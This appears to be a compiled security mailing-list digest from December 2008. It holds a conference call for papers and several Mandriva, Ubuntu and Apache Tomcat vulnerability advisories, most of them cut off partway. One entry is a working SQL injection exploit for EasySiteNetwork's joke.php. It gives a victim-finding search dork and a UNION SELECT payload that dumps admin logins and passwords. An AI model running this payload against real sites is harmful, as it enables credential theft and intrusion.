CONFidence 2009, CFP
Attention! Calling all practitioners in the field of IT security! The 5th edition of the best Polish IT security conference, CONFIDENCE 2008, is taking place in May 15/16, 2008. We invite all to send the proposed topic and abstracts of presentation till the end of January. Please, remember that CONFidence is an open, international conference and all presentations should be given in English. If you want to give your lecture in Polish, please send an e-mail to the address given below. The answer to CfP should include: # name, last name and e-mail address of the potential speaker # speaker's short bio, describing his experience and skills# speaker's place of residence # presentation topic with short description of proposed lecture (no more than 500 words) # non-standard technical requirements Applications should be sent to andrzej.targo...@}proidea.org.pl till 31 January, 2009. We are especially interested in presentation concerning: # 3G/4G, SS7, WLAN, RFID, Bluetooth Security # Analysis and reverse engineering of malicious code # Analysis of vulnerability, attacks and defence against networks, hardware, software # Virtualization and operating systems security # Data recovery, Forensic and Incident Response # Physical security # Firewall technologies # Web applications security and cryptographic Caution! We do not accept marketing, non-technical presentations aimed at presenting and selling any products. If your lecture presents company or its product, please do not send it! CONFidence conference is a non-profit event and speakers are not being paid. However, we always try to provide financial help and cover travel expenses and accommodation if possible. It needs to be agreed upon after acceptance of the submission, though. CONFidence Team http://2009.confidence.org.pl
[ MDVSA-2008:245 ] firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:245 http://www.mandriva.com/security/ ___ Package : firefox Date: December 17, 2008 Affected: 2009.0 ___ Problem Description: Security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox 3.x, version 3.0.5 (CVE-2008-5500, CVE-2008-5501, CVE-2008-5502, CVE-2008-5505, CVE-2008-5506, CVE-2008-5507, CVE-2008-5508, CVE-2008-5510, CVE-2008-5511, CVE-2008-5512, CVE-2008-5513). This update provides the latest Mozilla Firefox 3.x to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5500 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5501 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5502 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5505 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5506 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5507 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5508 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5510 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5511 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5512 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5513 http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.5 ___ Updated Packages: Mandriva Linux 2009.0: 8c26ae144535af31e98e911bbc210f71 2009.0/i586/beagle-0.3.8-13.3mdv2009.0.i586.rpm 7810ad014b7c1c098912b26500f7e484 2009.0/i586/beagle-crawl-system-0.3.8-13.3mdv2009.0.i586.rpm 4319abff57448721251018988222ef6d 2009.0/i586/beagle-doc-0.3.8-13.3mdv2009.0.i586.rpm cae43ca5754dff94a31f056cc51a12b5 2009.0/i586/beagle-epiphany-0.3.8-13.3mdv2009.0.i586.rpm 8cb211f17efd54a3671b676a5f2a4af2 2009.0/i586/beagle-evolution-0.3.8-13.3mdv2009.0.i586.rpm 96d9834e221a0ecb71c9bdd4d4779383 2009.0/i586/beagle-gui-0.3.8-13.3mdv2009.0.i586.rpm 86fec216541d1c44305127681e809ff5 2009.0/i586/beagle-gui-qt-0.3.8-13.3mdv2009.0.i586.rpm 33de345c066c93fbd5e8c1860f2c6825 2009.0/i586/beagle-libs-0.3.8-13.3mdv2009.0.i586.rpm 1a41dea943561f1c3adcec826bead0db 2009.0/i586/devhelp-0.21-3.2mdv2009.0.i586.rpm 4dbbd875a8dbf8bd2fd4888919921404 2009.0/i586/devhelp-plugins-0.21-3.2mdv2009.0.i586.rpm e58d51bc4fa89d702e636ba4b23cb389 2009.0/i586/epiphany-2.24.0.1-3.2mdv2009.0.i586.rpm 784fc591b55b31187d4485dfc5b96988 2009.0/i586/epiphany-devel-2.24.0.1-3.2mdv2009.0.i586.rpm 70a9c6d7eb2e12585236e8077c767d2f 2009.0/i586/firefox-3.0.5-0.1mdv2009.0.i586.rpm 404012d67b17271f9b1810ce7d4eff34 2009.0/i586/firefox-af-3.0.5-0.1mdv2009.0.i586.rpm e44792595c5eea5f89f9ad0e9e3e543f 2009.0/i586/firefox-ar-3.0.5-0.1mdv2009.0.i586.rpm cf87666de5298afee8f89cc1efc81170 2009.0/i586/firefox-be-3.0.5-0.1mdv2009.0.i586.rpm 845dbaffa1fb9971b5ee28f8be8b6581 2009.0/i586/firefox-bg-3.0.5-0.1mdv2009.0.i586.rpm b9cf097750b56f3c4e521e98fb1f9d56 2009.0/i586/firefox-bn-3.0.5-0.1mdv2009.0.i586.rpm cc293cd83a9ee72bb97c036f42273dee 2009.0/i586/firefox-ca-3.0.5-0.1mdv2009.0.i586.rpm 57a03f4acb708caa8eafd36fcb96dd7d 2009.0/i586/firefox-cs-3.0.5-0.1mdv2009.0.i586.rpm d3d2065839405f82066c403e698d1127 2009.0/i586/firefox-cy-3.0.5-0.1mdv2009.0.i586.rpm dc7edca3daf2cf64d3f2bbbc3ad8c167 2009.0/i586/firefox-da-3.0.5-0.1mdv2009.0.i586.rpm 9c5123ca87254d6586e5b18d97b22884 2009.0/i586/firefox-de-3.0.5-0.1mdv2009.0.i586.rpm b1b4d131d6b58708eac6df72bac0ceea 2009.0/i586/firefox-el-3.0.5-0.1mdv2009.0.i586.rpm 6caa13f23401f1c729063e31478e238f 2009.0/i586/firefox-en_GB-3.0.5-0.1mdv2009.0.i586.rpm 1f962624e5603c9179c7f5152d79fa9d 2009.0/i586/firefox-es_AR-3.0.5-0.1mdv2009.0.i586.rpm 03806678c5b83ae46a8127512d63d4f8 2009.0/i586/firefox-es_ES-3.0.5-0.1mdv2009.0.i586.rpm 052bf4dad24a6af7dd5d12bd62c1fd84 2009.0/i586/firefox-et-3.0.5-0.1mdv2009.0.i586.rpm 5f4c188605529e4a1298bd4292601276 2009.0/i586/firefox-eu-3.0.5-0.1mdv2009.0.i586.rpm d3cd29d6f4ea7707eb8b9098b9213cc8 2009.0/i586/firefox-ext-beagle-0.3.8-13.3mdv2009.0.i586.rpm 3bf794c00f80988fccdb647fba3cad60 2009.0/i586/firefox-ext-mozvoikko-0.9.5-4.2mdv2009.0.i586.rpm f79140ea312818425cf82dba0c958bc6 2009.0/i586/firefox-fi-3.0.5-0.1mdv2009.0.i586.rpm 34abbcf70521374e959b77aebd8988a3 2009.0/i586/firefox-fr-3.0.5-0.1mdv2009.0.i586.rpm c11a1a9ed5130792b4dfc93482b8aee5 2009.0/i586/firefox-fy-3.0.5-0.1mdv2009.0.i586.rpm 02d5fb831096441409b57f80d155ec4a 2009.0/i586/firefox-ga_IE-3.0.5-0.1mdv2009.0.i586.rpm b29af7537bca10986bf2340ac407a4ba 2009.0/i586/firefox-gl-3.0.5-0.1mdv2009.0.i586.rpm 2a9e1449989
EasySiteNetwork (joke.php?id) Remote SQL injection Vulnerability
### IRANIN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## EasySiteNetwork (joke.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_hp200 ## ## H0ME : www.only-4dl.tk ## ## Email : ehsan_hp...@hotmail.com ## ## VENDOR: http://www.easysitenetwork.com/ ## ## Persian Gulf 4 Ever! # # # # ## ## Dork : inurl:joke.php?id= "Powered by EasySiteNetwork" Exploite: www.victim.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login-- ### Admin Panel: www.victim.com/siteadmin ,## Special tanks to : All Parsi Hacker security Team members,SAHAND SHABAN , Dj7xpl , The.Mo3tafa , Jasoos Team ,Enigma2 ,### ### IRANIN THE BEST HACKERS IN THE WORLD ##
php python extension safe_mode bypass
[USN-695-1] shadow vulnerability
=== Ubuntu Security Notice USN-695-1 December 18, 2008 shadow vulnerability https://launchpad.net/bugs/306082 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: login 1:4.0.13-7ubuntu3.4 Ubuntu 7.10: login 1:4.0.18.1-9ubuntu0.2 Ubuntu 8.04 LTS: login 1:4.0.18.2-1ubuntu2.2 Ubuntu 8.10: login 1:4.1.1-1ubuntu1.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Paul Szabo discovered a race condition in login. While setting up tty permissions, login did not correctly handle symlinks. If a local attacker were able to gain control of the system utmp file, they could cause login to change the ownership and permissions on arbitrary files, leading to a root privilege escalation. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.4.diff.gz Size/MD5: 205508 177620b33b720ce87d522259acbdbe0c http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.4.dsc Size/MD5: 931 673a51cff0b63fd347c79c9545ea0fe4 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13.orig.tar.gz Size/MD5: 1622557 034fab52e187e63cb52f153bb7f304c8 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.4_amd64.deb Size/MD5: 249668 c5c19a139a5fe912d19076866078c6e0 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.4_amd64.deb Size/MD5: 683786 f2ef6413b8c60d9b6a586599fe2e8b1e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.4_i386.deb Size/MD5: 241052 31d9c29d22a4a01a8de1a629d4797165 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.4_i386.deb Size/MD5: 616702 e2237b8c7b6f8ec8d685caa31a2f58ab powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.4_powerpc.deb Size/MD5: 251530 f8d7a2e2ba0ac5eeaae53d37a9d99049 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.4_powerpc.deb Size/MD5: 665414 4d377d684bc618ca3c7e20521ea03a4e sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.4_sparc.deb Size/MD5: 240128 8a61b5741da03dbf64f97796461a7c5e http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.4_sparc.deb Size/MD5: 620410 b3c418caa6b787c682df86bc965613db Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.18.1-9ubuntu0.2.diff.gz Size/MD5: 147849 23e5cd2a20460c6083d4e99afd93bb1b http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.18.1-9ubuntu0.2.dsc Size/MD5: 1199 c86a0638f6f64d4214f212ff0381a86d http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.18.1.orig.tar.gz Size/MD5: 2354234 3f54eaa3a35e7c559f4def92e9957581 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.18.1-9ubuntu0.2_amd64.deb Size/MD5: 327468 c80b850497e00c01d8ad3817e8e7c9ad http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.18.1-9ubuntu0.2_amd64.deb Size/MD5: 795952 e72d9d7ad5ca2f5f79085320d27881cd i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.18.1-9ubuntu0.2_i386.deb Size/MD5: 320296 b1e64e3bd6f567babba9b0ffed18b023 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.18.1-9ubuntu0.2_i386.deb Size/MD5: 716214 5d1ce7904c45af4807721bcccf89049c lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/s/shadow/login_4.0.18.1-9ubuntu0.2_lpia.deb Size/MD5: 317166 9de8c0a5c50fa7a2fda13391fc01a964 http://ports.ubuntu.com/pool/main/s/shadow/passwd_4.0.18.1-9ubuntu0.2_lpia.deb Size/MD5: 709846 09a444f189c84cc2a705150a2a19a315 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.18.1-9ubuntu0.2_powerpc.deb Size/MD5: 328522 8b789214c1bad2adeb6d6cac6d144328 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.18.1-9ubuntu0.2_powerpc.de
[USN-694-1] libvirt vulnerability
=== Ubuntu Security Notice USN-694-1 December 18, 2008 libvirt vulnerability CVE-2008-5086 === A security issue affects the following Ubuntu releases: Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.10: libvirt00.3.0-0ubuntu2.1 Ubuntu 8.04 LTS: libvirt00.4.0-2ubuntu8.1 Ubuntu 8.10: libvirt00.4.4-3ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that libvirt did not mark certain operations as read-only. A local attacker may be able to perform privileged actions such as migrating virtual machines, adjusting autostart flags, or accessing privileged data in the virtual machine memory and disks. Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.3.0-0ubuntu2.1.diff.gz Size/MD5: 3544 e3f113d1e263a8a5b2b831de6d242d1b http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.3.0-0ubuntu2.1.dsc Size/MD5: 808 df2b4d52fcdba599d46d3316b13458ff http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.3.0.orig.tar.gz Size/MD5: 2265548 e6a85e2ef99f985a298376e01fcc7a3c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-dev_0.3.0-0ubuntu2.1_amd64.deb Size/MD5: 230520 783cfc179c03e40500fc1a1a3354dac4 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0_0.3.0-0ubuntu2.1_amd64.deb Size/MD5: 186806 4d7e7f531ad07b08264856bf9762dc20 http://security.ubuntu.com/ubuntu/pool/universe/libv/libvirt/libvirt-bin_0.3.0-0ubuntu2.1_amd64.deb Size/MD5: 136992 27a0e129f38e57faae36b0adf6e1b000 http://security.ubuntu.com/ubuntu/pool/universe/libv/libvirt/python-libvirt_0.3.0-0ubuntu2.1_amd64.deb Size/MD5:86872 1da16e06104d27759886b575d2b73f8f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-dev_0.3.0-0ubuntu2.1_i386.deb Size/MD5: 217692 56dd66f156bee8b01f4b68e23e2811d3 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0_0.3.0-0ubuntu2.1_i386.deb Size/MD5: 186672 3a708d77e58e68b4009937ae9500f8e6 http://security.ubuntu.com/ubuntu/pool/universe/libv/libvirt/libvirt-bin_0.3.0-0ubuntu2.1_i386.deb Size/MD5: 135332 69ba54123bc7cb52eebac54313ff6001 http://security.ubuntu.com/ubuntu/pool/universe/libv/libvirt/python-libvirt_0.3.0-0ubuntu2.1_i386.deb Size/MD5:85340 c67f3ea7487e838af3ee7a0a21be4241 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libv/libvirt/libvirt-dev_0.3.0-0ubuntu2.1_lpia.deb Size/MD5: 232922 d16c1c0f50b965c2f8a0663995764b5f http://ports.ubuntu.com/pool/main/libv/libvirt/libvirt0_0.3.0-0ubuntu2.1_lpia.deb Size/MD5: 198292 ff4ab36c840d51a92bc76d18aedba3c4 http://ports.ubuntu.com/pool/universe/libv/libvirt/libvirt-bin_0.3.0-0ubuntu2.1_lpia.deb Size/MD5: 142812 51aec3c2358e54a10783d6c14dcbfab1 http://ports.ubuntu.com/pool/universe/libv/libvirt/python-libvirt_0.3.0-0ubuntu2.1_lpia.deb Size/MD5:87042 80be0e16045d055f1afa897091a446bc Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0-2ubuntu8.1.diff.gz Size/MD5:18325 d9c67215893dd4041c4a114d7b8feddf http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0-2ubuntu8.1.dsc Size/MD5: 1080 360545d20502031bab8c298c71707346 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0.orig.tar.gz Size/MD5: 2968326 2f6c6adb62145988f0e5021e5cbd71d3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-doc_0.4.0-2ubuntu8.1_all.deb Size/MD5: 303538 bbc86d969cd89c814fbd2dcaed27d3c0 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-bin_0.4.0-2ubuntu8.1_amd64.deb Size/MD5:89346 7e272e9e45d8d76bfd7ffcf48fc6ec0f http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-dev_0.4.0-2ubuntu8.1_amd64.deb Size/MD5: 225052 3188ff93f87ddcc2a448db87c1d94272 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0-dbg_0.4.0-2ubuntu8.1_amd64.deb Size/MD5: 550738 b9ab13df10f0ab9d50e0311a8e99636c http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0_0.4.0-2ubuntu8.1_amd64.deb Size/MD5: 181422 4fdc4326e58624f344e5
[SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Update 2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Update 2 Severity: Important Vendor: Multiple (was The Apache Software Foundation) Versions Affected: Various Description (new information): This vulnerability was originally reported to the Apache Software Foundation as a Tomcat vulnerability. Investigations quickly identified that the root cause was an issue with the UTF-8 charset implementation within the JVM. The issue existed in multiple JVMs including current versions from Sun, HP, IBM, Apple and Apache. It was decided to continue to report this as a Tomcat vulnerability until such time as the JVM vendors had released fixed versions. Unfortunately, the release of fixed JVMs and associated vulnerability disclosure has not been co-ordinated. There has been some confusion within the user community as to the nature and root cause of CVE-2008-2938. Therefore, the Apache Tomcat Security Team is issuing this update to clarify the situation. Mitigation: Contact your JVM vendor for further information. Tomcat users may upgrade as follows to a Tomcat version that contains a workaround: 6.0.x users should upgrade to 6.0.18 5.5.x users should upgrade to 5.5.27 4.1.x users should upgrade to 4.1.39 Credit: This additional information was discovered by the Apache security team. References: http://tomcat.apache.org/security.html Mark Thomas -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAklKflkACgkQb7IeiTPGAkPEqwCg5WiCeyaGrUbP/PTIhqF8TGZt DcsAoJIx+NnKCCAk2JxGftVZbxxPrWGl =JALs -END PGP SIGNATURE-
[USN-690-3] Firefox vulnerabilities
=== Ubuntu Security Notice USN-690-3 December 18, 2008 firefox vulnerabilities CVE-2008-5500, CVE-2008-5503, CVE-2008-5506, CVE-2008-5507, CVE-2008-5511, CVE-2008-5512 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: firefox 1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: Several flaws were discovered in the browser engine. These problems could allow an attacker to crash the browser and possibly execute arbitrary code with user privileges. (CVE-2008-5500) Boris Zbarsky discovered that the same-origin check in Firefox could be bypassed by utilizing XBL-bindings. An attacker could exploit this to read data from other domains. (CVE-2008-5503) Marius Schilder discovered that Firefox did not properly handle redirects to an outside domain when an XMLHttpRequest was made to a same-origin resource. It's possible that sensitive information could be revealed in the XMLHttpRequest response. (CVE-2008-5506) Chris Evans discovered that Firefox did not properly protect a user's data when accessing a same-domain Javascript URL that is redirected to an unparsable Javascript off-site resource. If a user were tricked into opening a malicious website, an attacker may be able to steal a limited amount of private data. (CVE-2008-5507) Several flaws were discovered in the Javascript engine. If a user were tricked into opening a malicious website, an attacker could exploit this to execute arbitrary Javascript code within the context of another website or with chrome privileges. (CVE-2008-5511, CVE-2008-5512) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1.diff.gz Size/MD5: 184514 ea36713d00feb7d1a44974a0e1c7f493 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1.dsc Size/MD5: 1162 6930aff7e9ed188341f10c1a410ae8ec http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614i.orig.tar.gz Size/MD5: 48160160 7234454384feba2cea0c2fe41c1db3f0 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_all.deb Size/MD5:53606 88e207c0ae72435f1ee16e2a9198cc0d http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_all.deb Size/MD5:52716 720a5744971e6fdc93c6324473fce469 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb Size/MD5: 47668874 24ebc949c4b042769d1d192cde3fad6c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb Size/MD5: 2858706 b308aaff2727c534c0c10c938e01aca3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb Size/MD5:85988 03b8fab9f9e8c0066a2cf45c35efcb3a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb Size/MD5: 9491628 1bde3e7e8e4e5b7285025f3743ebdead http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb Size/MD5: 72 a49b67decdfc95d1ceec3c978761e511 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb Size/MD5: 165798 c5fc0c565b74a533e1293c1538296259 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb Size/MD5: 247788 d1739f167db8c0094dc14b7000ba816d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb Size/MD5: 825458 0d923da8d43e1d5028f8e8347a0c01dc http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb Size/MD5: 218528 90b4b67171bddf8e9636e8f9d8086524 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_i386.deb Size/MD5: 44216124 36645bf7f4e758f672f6ad7bccad30d3 http://security.ubuntu.com/
[USN-690-2] Firefox vulnerabilities
=== Ubuntu Security Notice USN-690-2 December 18, 2008 firefox vulnerabilities CVE-2008-5500, CVE-2008-5503, CVE-2008-5504, CVE-2008-5506, CVE-2008-5507, CVE-2008-5508, CVE-2008-5510, CVE-2008-5511, CVE-2008-5512, CVE-2008-5513 === A security issue affects the following Ubuntu releases: Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.10: firefox 2.0.0.19+nobinonly1-0ubuntu0.7.10.1 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: Several flaws were discovered in the browser engine. These problems could allow an attacker to crash the browser and possibly execute arbitrary code with user privileges. (CVE-2008-5500) Boris Zbarsky discovered that the same-origin check in Firefox could be bypassed by utilizing XBL-bindings. An attacker could exploit this to read data from other domains. (CVE-2008-5503) Several problems were discovered in the JavaScript engine. An attacker could exploit feed preview vulnerabilities to execute scripts from page content with chrome privileges. (CVE-2008-5504) Marius Schilder discovered that Firefox did not properly handle redirects to an outside domain when an XMLHttpRequest was made to a same-origin resource. It's possible that sensitive information could be revealed in the XMLHttpRequest response. (CVE-2008-5506) Chris Evans discovered that Firefox did not properly protect a user's data when accessing a same-domain Javascript URL that is redirected to an unparsable Javascript off-site resource. If a user were tricked into opening a malicious website, an attacker may be able to steal a limited amount of private data. (CVE-2008-5507) Chip Salzenberg, Justin Schuh, Tom Cross, and Peter William discovered Firefox did not properly parse URLs when processing certain control characters. (CVE-2008-5508) Kojima Hajime discovered that Firefox did not properly handle an escaped null character. An attacker may be able to exploit this flaw to bypass script sanitization. (CVE-2008-5510) Several flaws were discovered in the Javascript engine. If a user were tricked into opening a malicious website, an attacker could exploit this to execute arbitrary Javascript code within the context of another website or with chrome privileges. (CVE-2008-5511, CVE-2008-5512) Flaws were discovered in the session-restore feature of Firefox. If a user were tricked into opening a malicious website, an attacker could exploit this to perform cross-site scripting attacks or execute arbitrary Javascript code with chrome privileges. (CVE-2008-5513) Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.19+nobinonly1-0ubuntu0.7.10.1.diff.gz Size/MD5: 193899 36adc1276acd43f74f72cfcc1ae3d0e9 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.19+nobinonly1-0ubuntu0.7.10.1.dsc Size/MD5: 1667 191a120d310a4e50dc3890bc39dd5eb4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.19+nobinonly1.orig.tar.gz Size/MD5: 38003869 ef1cc2719a0d2e765e7395191917b0e1 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_all.deb Size/MD5: 200940 bb5074878422fcc2770502b9ccb0da27 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb Size/MD5: 78150706 95fdf710a1475b0bc9c2d05b93729e1d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb Size/MD5: 3199474 a81af067e5cd04967c4b073e4ea88b3d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb Size/MD5:98272 a5da4c672ee9cdb9238827240a1fd8d4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb Size/MD5:67296 1867fa5365e1877b2991f0012a5a0508 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb Size/MD5: 10470700 e782eb0e3ee75833b54f6bf6eb7ad587 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_i386.deb Size/MD5: 77284164 a71bc30bc1337cf8f764c4e34c0225bc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_i386.deb Size/MD5: 3187094 ac6687331ea182a211af874e78d6ed17 http://security.ubuntu.c
[USN-693-1] LittleCMS vulnerability
